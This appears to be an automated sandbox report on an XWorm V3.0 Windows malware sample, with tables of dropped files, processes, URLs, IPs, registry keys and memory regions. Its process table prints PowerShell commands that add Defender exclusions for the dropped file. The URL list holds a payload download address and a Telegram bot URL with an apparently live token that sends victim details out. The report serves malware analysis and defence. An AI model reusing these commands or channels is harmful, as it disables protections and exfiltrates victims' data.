Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
9NBx4Vmiuj.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
initial sample
|
||
C:\ProgramData\btjxg.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\btjxg.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\9NBx4Vmiuj.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TypeId.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\Log.tmp
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b0fv5l1q.20e.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brnwyzyn.tpv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cuq2bxmg.oo1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jkat1zxr.vdv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jzjrtcj4.r3o.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ljtmhhaa.jwl.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nkijes3r.1xr.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogljnoyt.xzm.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_phgzwgtn.bj3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ssovggd5.sy2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_td3mgzln.hsr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xnrbtkd2.esq.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\btjxg.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 26 16:24:19
2024, mtime=Tue Mar 26 16:24:19 2024, atime=Tue Mar 26 16:24:19 2024, length=152064, window=hide
|
dropped
|
There are 12 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\9NBx4Vmiuj.exe
|
"C:\Users\user\Desktop\9NBx4Vmiuj.exe"
|
||
C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe
|
C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
|
||
C:\Users\user\AppData\Local\Temp\btjxg.exe
|
"C:\Users\user\AppData\Local\Temp\btjxg.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe'
|
||
C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe
|
C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'btjxg.exe'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\btjxg.exe'
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 1 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://185.196.10.233/dggfsff.exe
|
185.196.10.233
|
||
https://api.telegram.org/bot5498061286:AAEOFPFhizSA_AbkzDV_OWcHlXVsegPpL_c/sendMessage?chat_id=1267602057&text=%E2%98%A0%20%5BXWorm%20V3.0%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A9FCA14390BF6B97E9DB7%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro
|
149.154.167.220
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://stackoverflow.com/q/14436606/23354
|
unknown
|
||
https://api.telegram.org
|
unknown
|
||
https://github.com/mgravell/protobuf-netJ
|
unknown
|
||
https://api.telegram.org/bot
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
http://crl.mic
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://github.com/mgravell/protobuf-net
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://github.com/mgravell/protobuf-neti
|
unknown
|
||
https://api.telegram.org/bot5498061286:AAEOFPFhizSA_AbkzDV_OWcHlXVsegPpL_c/sendMessage?chat_id=12676
|
unknown
|
||
https://stackoverflow.com/q/11564914/23354;
|
unknown
|
||
https://stackoverflow.com/q/2152978/23354
|
unknown
|
||
https://api.telegram.org/
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://api.telegrP
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://api.telegram.org
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://crl.micros
|
unknown
|
||
http://schemas.microsoft
|
unknown
|
There are 19 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
gjhfhgdg.insane.wang
|
185.196.10.233
|
||
api.telegram.org
|
149.154.167.220
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
157.254.223.19
|
unknown
|
United States
|
||
185.196.10.233
|
gjhfhgdg.insane.wang
|
Switzerland
|
||
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegSvcs_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegSvcs_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegSvcs_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegSvcs_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegSvcs_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegSvcs_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegSvcs_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegSvcs_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegSvcs_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegSvcs_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegSvcs_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegSvcs_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegSvcs_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RegSvcs_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\66369895937b82c448aed43e9a0f200e
|
18a49aed82e382b45161550bf2dfd1cc
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\btjxg_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\btjxg_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\btjxg_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\btjxg_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\btjxg_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\btjxg_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\btjxg_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\btjxg_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\btjxg_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\btjxg_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\btjxg_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\btjxg_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\btjxg_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\btjxg_RASMANCS
|
FileDirectory
|
There are 19 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
2341C890000
|
trusted library section
|
page read and write
|
||
20937418000
|
trusted library allocation
|
page read and write
|
||
2184E8F8000
|
trusted library allocation
|
page read and write
|
||
1E3B9201000
|
trusted library allocation
|
page read and write
|
||
234355C7000
|
heap
|
page read and write
|
||
1E3C92B6000
|
trusted library allocation
|
page read and write
|
||
20937300000
|
trusted library allocation
|
page read and write
|
||
13071000
|
trusted library allocation
|
page read and write
|
||
2342CE13000
|
trusted library allocation
|
page read and write
|
||
1E3C9938000
|
trusted library allocation
|
page read and write
|
||
20926CE1000
|
trusted library allocation
|
page read and write
|
||
2342CC3B000
|
trusted library allocation
|
page read and write
|
||
2341C991000
|
trusted library allocation
|
page read and write
|
||
2183E1C1000
|
trusted library allocation
|
page read and write
|
||
1E3C9848000
|
trusted library allocation
|
page read and write
|
||
1E3C9898000
|
trusted library allocation
|
page read and write
|
||
2184E858000
|
trusted library allocation
|
page read and write
|
||
310C000
|
trusted library allocation
|
page read and write
|
||
20937378000
|
trusted library allocation
|
page read and write
|
||
2184E7E0000
|
trusted library allocation
|
page read and write
|
||
20937328000
|
trusted library allocation
|
page read and write
|
||
23435160000
|
trusted library section
|
page read and write
|
||
2184E808000
|
trusted library allocation
|
page read and write
|
||
2342D0C8000
|
trusted library allocation
|
page read and write
|
||
1E3C9820000
|
trusted library allocation
|
page read and write
|
||
DE2000
|
unkown
|
page readonly
|
||
2341CB50000
|
trusted library allocation
|
page read and write
|
||
2342D191000
|
trusted library allocation
|
page read and write
|
||
30E5000
|
trusted library allocation
|
page read and write
|
||
2183E0B1000
|
heap
|
page read and write
|
||
28007A67000
|
trusted library allocation
|
page read and write
|
||
7FF8488B3000
|
trusted library allocation
|
page execute and read and write
|
||
1EC81DE1000
|
trusted library allocation
|
page read and write
|
||
7FF848A54000
|
trusted library allocation
|
page read and write
|
||
2AEBA807000
|
trusted library allocation
|
page read and write
|
||
305E000
|
stack
|
page read and write
|
||
1E3B7696000
|
heap
|
page read and write
|
||
1ECF4319000
|
heap
|
page read and write
|
||
1312000
|
heap
|
page read and write
|
||
234355CB000
|
heap
|
page read and write
|
||
7FF848AA0000
|
trusted library allocation
|
page read and write
|
||
DE0000
|
unkown
|
page readonly
|
||
209372B0000
|
trusted library allocation
|
page read and write
|
||
7FF848CA0000
|
trusted library allocation
|
page read and write
|
||
BB78BBE000
|
stack
|
page read and write
|
||
234352FE000
|
heap
|
page read and write
|
||
7FF848AE0000
|
trusted library allocation
|
page read and write
|
||
7FF848BD4000
|
trusted library allocation
|
page read and write
|
||
8C613EE000
|
stack
|
page read and write
|
||
3123000
|
trusted library allocation
|
page read and write
|
||
209251A6000
|
heap
|
page read and write
|
||
8C627CE000
|
stack
|
page read and write
|
||
BB785FE000
|
stack
|
page read and write
|
||
2183E57F000
|
trusted library allocation
|
page read and write
|
||
7FF8488CD000
|
trusted library allocation
|
page execute and read and write
|
||
2341CE0A000
|
trusted library allocation
|
page read and write
|
||
1ECF20D0000
|
trusted library allocation
|
page read and write
|
||
2341AE50000
|
heap
|
page read and write
|
||
23435751000
|
heap
|
page read and write
|
||
2AEB6D10000
|
heap
|
page read and write
|
||
7FF848890000
|
trusted library allocation
|
page read and write
|
||
1E3B94D2000
|
trusted library allocation
|
page read and write
|
||
234349C0000
|
trusted library allocation
|
page read and write
|
||
1ECF20B0000
|
trusted library allocation
|
page read and write
|
||
2341CF9D000
|
trusted library allocation
|
page read and write
|
||
7FF848C70000
|
trusted library allocation
|
page read and write
|
||
21856C1F000
|
heap
|
page read and write
|
||
1ECF449A000
|
heap
|
page read and write
|
||
7FF848883000
|
trusted library allocation
|
page execute and read and write
|
||
234355DB000
|
heap
|
page read and write
|
||
A85BBFC000
|
stack
|
page read and write
|
||
7FF848BB0000
|
trusted library allocation
|
page read and write
|
||
7FF848BE0000
|
trusted library allocation
|
page read and write
|
||
23434D16000
|
heap
|
page read and write
|
||
7FF8488BD000
|
trusted library allocation
|
page execute and read and write
|
||
1ECF3BA0000
|
heap
|
page execute and read and write
|
||
1ECF444F000
|
heap
|
page read and write
|
||
7FF848B30000
|
trusted library allocation
|
page read and write
|
||
2AEB6ED5000
|
heap
|
page read and write
|
||
1C660000
|
heap
|
page read and write
|
||
2185688F000
|
heap
|
page read and write
|
||
1ECF443F000
|
heap
|
page read and write
|
||
20926CD0000
|
heap
|
page execute and read and write
|
||
21F4FFE000
|
stack
|
page read and write
|
||
7FF848B20000
|
trusted library allocation
|
page read and write
|
||
2183E3EE000
|
trusted library allocation
|
page read and write
|
||
1E3B7690000
|
heap
|
page read and write
|
||
1EC80F99000
|
trusted library allocation
|
page read and write
|
||
1ECF1EF0000
|
heap
|
page read and write
|
||
7FF848976000
|
trusted library allocation
|
page execute and read and write
|
||
1E3B76D6000
|
heap
|
page read and write
|
||
7FF848882000
|
trusted library allocation
|
page read and write
|
||
7FF848A62000
|
trusted library allocation
|
page read and write
|
||
2341CC1A000
|
trusted library allocation
|
page read and write
|
||
2AEB9CAF000
|
trusted library allocation
|
page read and write
|
||
2341CB64000
|
trusted library allocation
|
page read and write
|
||
2183C32D000
|
heap
|
page read and write
|
||
7FF848ACD000
|
trusted library allocation
|
page read and write
|
||
7FF84893C000
|
trusted library allocation
|
page execute and read and write
|
||
2341CEB6000
|
trusted library allocation
|
page read and write
|
||
7FF8489B4000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848890000
|
trusted library allocation
|
page read and write
|
||
28004B70000
|
heap
|
page read and write
|
||
1EC81894000
|
trusted library allocation
|
page read and write
|
||
7FF848BF0000
|
trusted library allocation
|
page read and write
|
||
2183E66F000
|
trusted library allocation
|
page read and write
|
||
234356BE000
|
heap
|
page read and write
|
||
1E3B768C000
|
heap
|
page read and write
|
||
8C62947000
|
stack
|
page read and write
|
||
12C3000
|
heap
|
page read and write
|
||
1E3C9583000
|
trusted library allocation
|
page read and write
|
||
234354E0000
|
heap
|
page read and write
|
||
2343577E000
|
heap
|
page read and write
|
||
28007431000
|
trusted library allocation
|
page read and write
|
||
21856A77000
|
heap
|
page read and write
|
||
28004DE0000
|
trusted library allocation
|
page read and write
|
||
316E000
|
trusted library allocation
|
page read and write
|
||
7FF848BE2000
|
trusted library allocation
|
page read and write
|
||
2341CF84000
|
trusted library allocation
|
page read and write
|
||
12AC000
|
heap
|
page read and write
|
||
12CA000
|
heap
|
page read and write
|
||
7FF848BE8000
|
trusted library allocation
|
page read and write
|
||
7FF848A80000
|
trusted library allocation
|
page read and write
|
||
2800670F000
|
heap
|
page read and write
|
||
1735000
|
heap
|
page read and write
|
||
136A000
|
heap
|
page read and write
|
||
1E3C94A3000
|
trusted library allocation
|
page read and write
|
||
30E9000
|
trusted library allocation
|
page read and write
|
||
21856AC6000
|
heap
|
page read and write
|
||
7FF848AB0000
|
trusted library allocation
|
page read and write
|
||
28006EAD000
|
trusted library allocation
|
page read and write
|
||
2AEB89C7000
|
heap
|
page execute and read and write
|
||
2AEB6EF0000
|
heap
|
page read and write
|
||
2AEB6E77000
|
heap
|
page read and write
|
||
2341CD90000
|
trusted library allocation
|
page read and write
|
||
BB79A0C000
|
stack
|
page read and write
|
||
2AEB8832000
|
heap
|
page read and write
|
||
3071000
|
trusted library allocation
|
page read and write
|
||
234352C0000
|
heap
|
page read and write
|
||
2092520A000
|
heap
|
page read and write
|
||
234356C0000
|
heap
|
page read and write
|
||
7FF848BEC000
|
trusted library allocation
|
page read and write
|
||
7FF848930000
|
trusted library allocation
|
page read and write
|
||
2183E31C000
|
trusted library allocation
|
page read and write
|
||
28004C43000
|
heap
|
page read and write
|
||
7FF848CE0000
|
trusted library allocation
|
page read and write
|
||
20937469000
|
trusted library allocation
|
page read and write
|
||
8C62A4E000
|
stack
|
page read and write
|
||
BB788FF000
|
stack
|
page read and write
|
||
7FF8488AD000
|
trusted library allocation
|
page execute and read and write
|
||
2093F4E0000
|
heap
|
page execute and read and write
|
||
136E000
|
heap
|
page read and write
|
||
2AEB6F70000
|
trusted library section
|
page read and write
|
||
3181000
|
trusted library allocation
|
page read and write
|
||
1ECF20C0000
|
heap
|
page readonly
|
||
F41000
|
stack
|
page read and write
|
||
7FF848AF0000
|
trusted library allocation
|
page read and write
|
||
2AED0DE3000
|
heap
|
page read and write
|
||
2801EF52000
|
heap
|
page read and write
|
||
28006965000
|
heap
|
page read and write
|
||
7FF848936000
|
trusted library allocation
|
page read and write
|
||
20925140000
|
heap
|
page read and write
|
||
1E3D1B87000
|
heap
|
page read and write
|
||
1EC90011000
|
trusted library allocation
|
page read and write
|
||
28016A11000
|
trusted library allocation
|
page read and write
|
||
7FF848960000
|
trusted library allocation
|
page execute and read and write
|
||
21856B80000
|
heap
|
page read and write
|
||
7FF848AE0000
|
trusted library allocation
|
page read and write
|
||
2184E483000
|
trusted library allocation
|
page read and write
|
||
1EC804CD000
|
trusted library allocation
|
page read and write
|
||
2183E020000
|
heap
|
page read and write
|
||
7FF848BD0000
|
trusted library allocation
|
page read and write
|
||
2AEB8A01000
|
trusted library allocation
|
page read and write
|
||
2183C6B5000
|
heap
|
page read and write
|
||
23435338000
|
heap
|
page read and write
|
||
2183E53E000
|
trusted library allocation
|
page read and write
|
||
1ECF4375000
|
heap
|
page read and write
|
||
97F95EE000
|
stack
|
page read and write
|
||
2183E542000
|
trusted library allocation
|
page read and write
|
||
7FF848B50000
|
trusted library allocation
|
page execute and read and write
|
||
20937163000
|
trusted library allocation
|
page read and write
|
||
21856B79000
|
heap
|
page read and write
|
||
5B579FC000
|
stack
|
page read and write
|
||
7FF848B6D000
|
trusted library allocation
|
page read and write
|
||
2183E586000
|
trusted library allocation
|
page read and write
|
||
7FF8488B4000
|
trusted library allocation
|
page read and write
|
||
1E3B75E0000
|
heap
|
page read and write
|
||
1BD4E000
|
stack
|
page read and write
|
||
7FF8488CB000
|
trusted library allocation
|
page execute and read and write
|
||
1BDD9000
|
heap
|
page read and write
|
||
1730000
|
heap
|
page read and write
|
||
CDCF3E1000
|
stack
|
page read and write
|
||
7FF8488C4000
|
trusted library allocation
|
page read and write
|
||
1BA50000
|
heap
|
page execute and read and write
|
||
2183E43D000
|
trusted library allocation
|
page read and write
|
||
7FF848B00000
|
trusted library allocation
|
page read and write
|
||
7FF848986000
|
trusted library allocation
|
page execute and read and write
|
||
5B561F7000
|
stack
|
page read and write
|
||
7FF848C00000
|
trusted library allocation
|
page read and write
|
||
1E3C9A01000
|
trusted library allocation
|
page read and write
|
||
1C14E000
|
stack
|
page read and write
|
||
2AED1115000
|
heap
|
page read and write
|
||
311A000
|
trusted library allocation
|
page read and write
|
||
2AEB6E3D000
|
heap
|
page read and write
|
||
2183C250000
|
heap
|
page read and write
|
||
234352B9000
|
heap
|
page read and write
|
||
7FF8488B2000
|
trusted library allocation
|
page read and write
|
||
1E3B7692000
|
heap
|
page read and write
|
||
2341CAD8000
|
trusted library allocation
|
page read and write
|
||
12D2000
|
heap
|
page read and write
|
||
1E3C99B1000
|
trusted library allocation
|
page read and write
|
||
7FF848884000
|
trusted library allocation
|
page read and write
|
||
7FF848B70000
|
trusted library allocation
|
page read and write
|
||
218561F0000
|
trusted library allocation
|
page read and write
|
||
2341AF70000
|
heap
|
page read and write
|
||
7FF848C80000
|
trusted library allocation
|
page read and write
|
||
2341AFA2000
|
heap
|
page read and write
|
||
1E3C9683000
|
trusted library allocation
|
page read and write
|
||
7FF848B50000
|
trusted library allocation
|
page read and write
|
||
7FF848B10000
|
trusted library allocation
|
page read and write
|
||
2AEC8A31000
|
trusted library allocation
|
page read and write
|
||
7FF8488A3000
|
trusted library allocation
|
page execute and read and write
|
||
2341CB72000
|
trusted library allocation
|
page read and write
|
||
7FF848B50000
|
trusted library allocation
|
page read and write
|
||
2AEB9B66000
|
trusted library allocation
|
page read and write
|
||
7FF848893000
|
trusted library allocation
|
page execute and read and write
|
||
130C000
|
heap
|
page read and write
|
||
BB78E3E000
|
stack
|
page read and write
|
||
2183C2A0000
|
trusted library allocation
|
page read and write
|
||
2AED1090000
|
heap
|
page read and write
|
||
7FF8488CB000
|
trusted library allocation
|
page execute and read and write
|
||
280169E1000
|
trusted library allocation
|
page read and write
|
||
1E3B75C0000
|
heap
|
page read and write
|
||
2800794E000
|
trusted library allocation
|
page read and write
|
||
2AEB9A0E000
|
trusted library allocation
|
page read and write
|
||
7FF848B10000
|
trusted library allocation
|
page read and write
|
||
2AED0DF0000
|
heap
|
page read and write
|
||
7FF848B10000
|
trusted library allocation
|
page read and write
|
||
7FF8488BA000
|
trusted library allocation
|
page read and write
|
||
BB78CBC000
|
stack
|
page read and write
|
||
7FF848A3A000
|
trusted library allocation
|
page read and write
|
||
2AEB89F0000
|
heap
|
page read and write
|
||
234352A0000
|
heap
|
page read and write
|
||
1270000
|
heap
|
page read and write
|
||
7FF8488B0000
|
trusted library allocation
|
page read and write
|
||
7FF848BEC000
|
trusted library allocation
|
page read and write
|
||
3164000
|
trusted library allocation
|
page read and write
|
||
BB78FBB000
|
stack
|
page read and write
|
||
2184E949000
|
trusted library allocation
|
page read and write
|
||
234352D6000
|
heap
|
page read and write
|
||
7FF848B10000
|
trusted library allocation
|
page read and write
|
||
7FF848D0F000
|
trusted library allocation
|
page read and write
|
||
21856B00000
|
heap
|
page read and write
|
||
7FF848A40000
|
trusted library allocation
|
page read and write
|
||
1D56A000
|
stack
|
page read and write
|
||
2341CC00000
|
trusted library allocation
|
page read and write
|
||
2183E026000
|
heap
|
page read and write
|
||
7FF84895C000
|
trusted library allocation
|
page execute and read and write
|
||
23435605000
|
heap
|
page read and write
|
||
7FF848AD0000
|
trusted library allocation
|
page read and write
|
||
7FF8489E3000
|
trusted library allocation
|
page execute and read and write
|
||
1EC80F91000
|
trusted library allocation
|
page read and write
|
||
1ECF1FD1000
|
heap
|
page read and write
|
||
28004C00000
|
heap
|
page read and write
|
||
313C000
|
trusted library allocation
|
page read and write
|
||
97FAACC000
|
stack
|
page read and write
|
||
234356FA000
|
heap
|
page read and write
|
||
7FF848B00000
|
trusted library allocation
|
page read and write
|
||
28006932000
|
heap
|
page read and write
|
||
2AED0FC0000
|
heap
|
page execute and read and write
|
||
7FF848A50000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848AC0000
|
trusted library allocation
|
page read and write
|
||
21856AB2000
|
heap
|
page read and write
|
||
7FF848B60000
|
trusted library allocation
|
page read and write
|
||
2183E063000
|
heap
|
page read and write
|
||
21856C03000
|
heap
|
page read and write
|
||
BB78DBE000
|
stack
|
page read and write
|
||
7FF8488A0000
|
trusted library allocation
|
page read and write
|
||
7FF8488A3000
|
trusted library allocation
|
page execute and read and write
|
||
2184E4C3000
|
trusted library allocation
|
page read and write
|
||
21856A30000
|
heap
|
page read and write
|
||
7FF848BEA000
|
trusted library allocation
|
page read and write
|
||
2341CBAA000
|
trusted library allocation
|
page read and write
|
||
2AEBA7E2000
|
trusted library allocation
|
page read and write
|
||
7FF8488C4000
|
trusted library allocation
|
page read and write
|
||
1E3B78E0000
|
heap
|
page read and write
|
||
5B56DFE000
|
stack
|
page read and write
|
||
A85B3FF000
|
stack
|
page read and write
|
||
2183E756000
|
trusted library allocation
|
page read and write
|
||
7FF848BD9000
|
trusted library allocation
|
page read and write
|
||
209251A8000
|
heap
|
page read and write
|
||
BB78F3E000
|
stack
|
page read and write
|
||
7FF848950000
|
trusted library allocation
|
page execute and read and write
|
||
1E3B95A9000
|
trusted library allocation
|
page read and write
|
||
7FF8489A0000
|
trusted library allocation
|
page execute and read and write
|
||
2183C4B0000
|
heap
|
page execute and read and write
|
||
2183E097000
|
heap
|
page read and write
|
||
8C61C7F000
|
stack
|
page read and write
|
||
2183E11E000
|
heap
|
page read and write
|
||
1ECF43D8000
|
heap
|
page read and write
|
||
7FF8489B0000
|
trusted library allocation
|
page execute and read and write
|
||
28016CD8000
|
trusted library allocation
|
page read and write
|
||
7FF8488C0000
|
trusted library allocation
|
page read and write
|
||
2AEB7005000
|
heap
|
page read and write
|
||
2AED1156000
|
heap
|
page read and write
|
||
2AEB9633000
|
trusted library allocation
|
page read and write
|
||
2185689C000
|
heap
|
page read and write
|
||
8C61CFF000
|
stack
|
page read and write
|
||
21856B7E000
|
heap
|
page read and write
|
||
7FF848A4A000
|
trusted library allocation
|
page read and write
|
||
234353EC000
|
heap
|
page read and write
|
||
2AEB7040000
|
trusted library allocation
|
page read and write
|
||
2801EF44000
|
heap
|
page read and write
|
||
7FF848BD9000
|
trusted library allocation
|
page read and write
|
||
23435747000
|
heap
|
page read and write
|
||
21856C4A000
|
heap
|
page read and write
|
||
2341AE90000
|
heap
|
page read and write
|
||
CDCFBFE000
|
stack
|
page read and write
|
||
2092517C000
|
heap
|
page read and write
|
||
8C61B78000
|
stack
|
page read and write
|
||
2AEB6EEA000
|
heap
|
page read and write
|
||
7FF848C73000
|
trusted library allocation
|
page read and write
|
||
7FF848A50000
|
trusted library allocation
|
page read and write
|
||
1ECF44A5000
|
heap
|
page read and write
|
||
1EC81219000
|
trusted library allocation
|
page read and write
|
||
7FF8488CD000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848A35000
|
trusted library allocation
|
page read and write
|
||
7DF44C750000
|
trusted library allocation
|
page execute and read and write
|
||
8C629CD000
|
stack
|
page read and write
|
||
BB78D39000
|
stack
|
page read and write
|
||
1E3C9503000
|
trusted library allocation
|
page read and write
|
||
1EC81E2B000
|
trusted library allocation
|
page read and write
|
||
7FF848A80000
|
trusted library allocation
|
page read and write
|
||
7FF848A3A000
|
trusted library allocation
|
page read and write
|
||
1EC81035000
|
trusted library allocation
|
page read and write
|
||
2341CD4F000
|
trusted library allocation
|
page read and write
|
||
2183E7A1000
|
trusted library allocation
|
page read and write
|
||
21856A8D000
|
heap
|
page read and write
|
||
2AED1166000
|
heap
|
page read and write
|
||
28004DF0000
|
heap
|
page readonly
|
||
7FF848A67000
|
trusted library allocation
|
page read and write
|
||
1EC80D7B000
|
trusted library allocation
|
page read and write
|
||
2AEBA294000
|
trusted library allocation
|
page read and write
|
||
7FF848C40000
|
trusted library allocation
|
page read and write
|
||
28006A67000
|
trusted library allocation
|
page read and write
|
||
7FF8488B0000
|
trusted library allocation
|
page read and write
|
||
